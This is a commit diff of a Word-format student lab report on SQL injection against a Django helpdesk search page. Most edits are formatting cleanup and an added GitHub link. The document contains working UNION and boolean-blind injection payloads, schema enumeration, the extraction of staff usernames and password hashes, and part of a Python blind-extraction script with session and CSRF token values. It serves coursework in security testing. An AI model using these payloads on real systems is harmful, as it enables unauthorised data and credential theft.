<commit_message>
Update Lab001 SQL injection assignment
</commit_message>
<xml_diff>
--- a/Lab001/Assignment 1 - SQL Injection Ziad Abillama.docx
+++ b/Lab001/Assignment 1 - SQL Injection Ziad Abillama.docx
@@ -331,6 +331,21 @@
                                   </w:sdtContent>
                                 </w:sdt>
                               </w:p>
+                              <w:p>
+                                <w:pPr>
+                                  <w:pStyle w:val="NoSpacing"/>
+                                  <w:jc w:val="center"/>
+                                  <w:rPr>
+                                    <w:color w:val="156082" w:themeColor="accent1"/>
+                                  </w:rPr>
+                                </w:pPr>
+                                <w:r>
+                                  <w:rPr>
+                                    <w:color w:val="156082" w:themeColor="accent1"/>
+                                  </w:rPr>
+                                  <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</w:t>
+                                </w:r>
+                              </w:p>
                             </w:txbxContent>
                           </wps:txbx>
                           <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="b" anchorCtr="0" forceAA="0" compatLnSpc="1">
@@ -433,6 +448,21 @@
                             </w:sdtContent>
                           </w:sdt>
                         </w:p>
+                        <w:p>
+                          <w:pPr>
+                            <w:pStyle w:val="NoSpacing"/>
+                            <w:jc w:val="center"/>
+                            <w:rPr>
+                              <w:color w:val="156082" w:themeColor="accent1"/>
+                            </w:rPr>
+                          </w:pPr>
+                          <w:r>
+                            <w:rPr>
+                              <w:color w:val="156082" w:themeColor="accent1"/>
+                            </w:rPr>
+                            <w:t>https://github.com/ZiadAbillama/EECE503M-Lab</w:t>
+                          </w:r>
+                        </w:p>
                       </w:txbxContent>
                     </v:textbox>
                     <w10:wrap anchorx="margin" anchory="page"/>
@@ -664,11 +694,9 @@
             <w:r>
               <w:t>q=</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>ziadtestticket</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1003,7 +1031,6 @@
             <w:r>
               <w:t>+</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>OR</w:t>
             </w:r>
@@ -1019,7 +1046,6 @@
             <w:r>
               <w:t>LIKE</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>+’</w:t>
             </w:r>
@@ -1081,7 +1107,6 @@
             <w:pPr>
               <w:jc w:val="both"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>OR</w:t>
             </w:r>
@@ -1097,7 +1122,6 @@
             <w:r>
               <w:t>LIKE</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>+’</w:t>
             </w:r>
@@ -1264,15 +1288,7 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status</w:t>
+              <w:t>SELECT id, title, submitter_email, status</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1280,13 +1296,8 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>FROM helpdesk_ticket</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1328,15 +1339,7 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status</w:t>
+              <w:t>SELECT id, title, submitter_email, status</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1344,13 +1347,8 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>FROM helpdesk_ticket</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:pPr>
@@ -1487,13 +1485,8 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>q=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ziadtestticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>q=ziadtestticket</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -1626,15 +1619,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>likely original query structure is</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:</w:t>
+        <w:t>The likely original query structure is:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -1655,26 +1640,13 @@
           <w:p>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t xml:space="preserve">SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>SELECT id, title, submitter_email, status</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM helpdesk_ticket</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -1709,26 +1681,13 @@
           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t xml:space="preserve">SELECT id, title, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>submitter_email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>, status</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:r>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>helpdesk_ticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>SELECT id, title, submitter_email, status</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>FROM helpdesk_ticket</w:t>
+            </w:r>
           </w:p>
           <w:p>
             <w:r>
@@ -1877,13 +1836,8 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t>q=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ziadtestticket</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>q=ziadtestticket</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2143,39 +2097,10 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t>q=zzzz’+UNION+SELECT+’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>aaaa</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>’,’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>bbbb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>’,’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cccc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>’,’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>dddd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>’</w:t>
+              <w:t>q=zzzz’+UNION+SELECT+’aaaa’,’</w:t>
+            </w:r>
+            <w:r>
+              <w:t>bbbb’,’cccc’,’dddd’</w:t>
             </w:r>
             <w:r>
               <w:t>--</w:t>
@@ -2270,25 +2195,7 @@
               <w:jc w:val="both"/>
             </w:pPr>
             <w:r>
-              <w:t>q=zzzz’+UNION+SELECT+NULL,’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:t>bbbb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:t>’,’</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cccc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>’,NULL--</w:t>
+              <w:t>q=zzzz’+UNION+SELECT+NULL,’bbbb’,’cccc’,NULL--</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2375,15 +2282,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">With a working UNION structure, I queried PostgreSQL's </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>information_schema</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> tables through the visible text column:</w:t>
+        <w:t>With a working UNION structure, I queried PostgreSQL's information_schema tables through the visible text column:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2489,15 +2388,7 @@
         <w:t>T</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">he response returned 37 public table names. The list included </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, which is the Django account table and matched the target data for this objective.</w:t>
+        <w:t>he response returned 37 public table names. The list included auth_user, which is the Django account table and matched the target data for this objective.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2551,13 +2442,8 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 3.5b: Search response showing public table names including </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Figure 3.5b: Search response showing public table names including auth_user</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2668,15 +2554,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 3.5c: Burp request enumerating </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> table columns</w:t>
+        <w:t>Figure 3.5c: Burp request enumerating auth_user table columns</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2691,26 +2569,10 @@
         <w:t>Result:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> The response returned 11 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> column names. </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">The relevant columns were username and password, which could be selected directly from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> The response returned 11 auth_user column names. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>The relevant columns were username and password, which could be selected directly from auth_user.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2766,15 +2628,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure 3.5d: Search response showing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> columns including username and password</w:t>
+        <w:t>Figure 3.5d: Search response showing auth_user columns including username and password</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2787,15 +2641,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Finally, I selected the username and password columns from </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and concatenated them into one visible text field:</w:t>
+        <w:t>Finally, I selected the username and password columns from auth_user and concatenated them into one visible text field:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2857,31 +2703,7 @@
         <w:t>Result:</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> The response returned four account records. Each row displayed a username followed by its stored PBKDF2-SHA256 password hash. The returned users included </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rmasri</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>jdoe</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, admin, and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tokafor</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> The response returned four account records. Each row displayed a username followed by its stored PBKDF2-SHA256 password hash. The returned users included rmasri, jdoe, admin, and tokafor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2949,15 +2771,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Objective 3 was achieved. The q parameter can be used with UNION SELECT to change the search query from returning ticket data to returning records from the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>auth_user</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> table. By matching the four-column structure and placing text data in a reflected column, the search response displayed staff usernames and their stored password hashes.</w:t>
+        <w:t>Objective 3 was achieved. The q parameter can be used with UNION SELECT to change the search query from returning ticket data to returning records from the auth_user table. By matching the four-column structure and placing text data in a reflected column, the search response displayed staff usernames and their stored password hashes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2979,15 +2793,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Objective 3's UNION injection displayed the stolen data directly in the results table. For this objective, the goal is to recover the same data through a request whose response never contains it: only a true/false signal. I reused the confirmed 4-column UNION structure from Objective 3, but instead of selecting real data, I appended a WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>clause</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> so the injected row only appears when a condition is true. The presence or absence of that extra row (visible only as a change in the match count, e.g. "1 match." vs "0 matches.") is the oracle.</w:t>
+        <w:t>Objective 3's UNION injection displayed the stolen data directly in the results table. For this objective, the goal is to recover the same data through a request whose response never contains it: only a true/false signal. I reused the confirmed 4-column UNION structure from Objective 3, but instead of selecting real data, I appended a WHERE clause so the injected row only appears when a condition is true. The presence or absence of that extra row (visible only as a change in the match count, e.g. "1 match." vs "0 matches.") is the oracle.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3030,11 +2836,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>q=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zzzz'</w:t>
+              <w:t>q=zzzz'</w:t>
             </w:r>
             <w:r>
               <w:t>+</w:t>
@@ -3046,11 +2848,7 @@
               <w:t>+</w:t>
             </w:r>
             <w:r>
-              <w:t>SELECT</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> NULL,'x',NULL,NULL</w:t>
+              <w:t>SELECT NULL,'x',NULL,NULL</w:t>
             </w:r>
             <w:r>
               <w:t>+</w:t>
@@ -3127,8 +2925,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750D5C6D" wp14:editId="73C83057">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="750D5C6D" wp14:editId="73E83DCF">
             <wp:extent cx="6858000" cy="2914650"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="947386988" name="Picture 9"/>
@@ -3183,22 +2984,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t>2a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>True condition (LENGTH(password)&gt;0) – “ 1 match.”, no data displayed</w:t>
+        <w:t>Figure 4.2a: True condition (LENGTH(password)&gt;0) – “ 1 match.”, no data displayed</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -3231,11 +3017,7 @@
               <w:t>q=</w:t>
             </w:r>
             <w:r>
-              <w:t>=</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>zzzz'</w:t>
+              <w:t>=zzzz'</w:t>
             </w:r>
             <w:r>
               <w:t>+</w:t>
@@ -3247,11 +3029,7 @@
               <w:t>+</w:t>
             </w:r>
             <w:r>
-              <w:t>SELECT</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> NULL,'x',NULL,NULL</w:t>
+              <w:t>SELECT NULL,'x',NULL,NULL</w:t>
             </w:r>
             <w:r>
               <w:t>+</w:t>
@@ -3302,10 +3080,7 @@
               <w:t>&gt;</w:t>
             </w:r>
             <w:r>
-              <w:t>+</w:t>
-            </w:r>
-            <w:r>
-              <w:t>100</w:t>
+              <w:t>+100</w:t>
             </w:r>
             <w:r>
               <w:t>0--</w:t>
@@ -3331,9 +3106,12 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C9FC5EC" wp14:editId="0C17453F">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C9FC5EC" wp14:editId="477BD005">
             <wp:extent cx="6848475" cy="2933700"/>
             <wp:effectExtent l="0" t="0" r="9525" b="0"/>
             <wp:docPr id="1953660901" name="Picture 8"/>
@@ -3388,16 +3166,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Figure </w:t>
-      </w:r>
-      <w:r>
-        <w:t>4.2b</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>False condition (LENGTH(password).1000) – “0 matches.”, no data displayed</w:t>
+        <w:t>Figure 4.2b: False condition (LENGTH(password).1000) – “0 matches.”, no data displayed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3456,15 +3225,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Recovers </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>auth_user.password</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> for username='admin' one character at a time,</w:t>
+              <w:t>Recovers auth_user.password for username='admin' one character at a time,</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3522,23 +3283,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve"># Grab a fresh </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sessionid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>csrftoken</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> from Burp before running.</w:t>
+              <w:t># Grab a fresh sessionid/csrftoken from Burp before running.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3554,31 +3299,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>csrftoken</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>    "</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sessionid</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
+              <w:t>    "csrftoken": "NvgGviz5La4wMfR4tEFswoWVTgb6C3Xa",</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    "sessionid": "g0bvxofpwz56jx49gn7wb3s2og5pjjc9",</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3607,15 +3336,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">SUBQUERY = "SELECT password FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>auth_user</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> WHERE username='admin'"</w:t>
+              <w:t>SUBQUERY = "SELECT password FROM auth_user WHERE username='admin'"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3629,63 +3350,23 @@
             </w:pPr>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>def oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>: str) -&gt; bool:</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    """True if the injected UNION row appears (i.e. </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> is true)."""</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">    payload = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>f"zzzz</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">' UNION SELECT </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>NULL,'x',NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> WHERE {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>condition_sql</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}--"</w:t>
+              <w:t>def oracle(condition_sql: str) -&gt; bool:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    """True if the injected UNION row appears (i.e. condition_sql is true)."""</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    payload = f"zzzz' UNION SELECT NULL,'x',NULL,NULL WHERE {condition_sql}--"</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3701,47 +3382,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">    m = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>re.search</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(r"(\d+)\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>s+match</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">", </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>r.text</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>)  # matches "1 match." and "N matches."</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="278" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t>    count = int(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>m.group</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(1)) if m else 0</w:t>
+              <w:t>    m = re.search(r"(\d+)\s+match", r.text)  # matches "1 match." and "N matches."</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="278" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t>    count = int(m.group(1)) if m else 0</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3762,15 +3411,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">def </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_length</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(subquery: str) -&gt; int:</w:t>
+              <w:t>def get_length(subquery: str) -&gt; int:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3802,15 +3443,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>        if oracle(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>f"LENGTH</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(({subquery})) &gt; {mid}"):</w:t>
+              <w:t>        if oracle(f"LENGTH(({subquery})) &gt; {mid}"):</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3855,15 +3488,7 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">def </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>get_char</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>(subquery: str, pos: int) -&gt; str:</w:t>
+              <w:t>def get_char(subquery: str, pos: int) -&gt; str:</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3895,39 +3520,15 @@
               <w:spacing w:line="278" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">        </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>cond</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
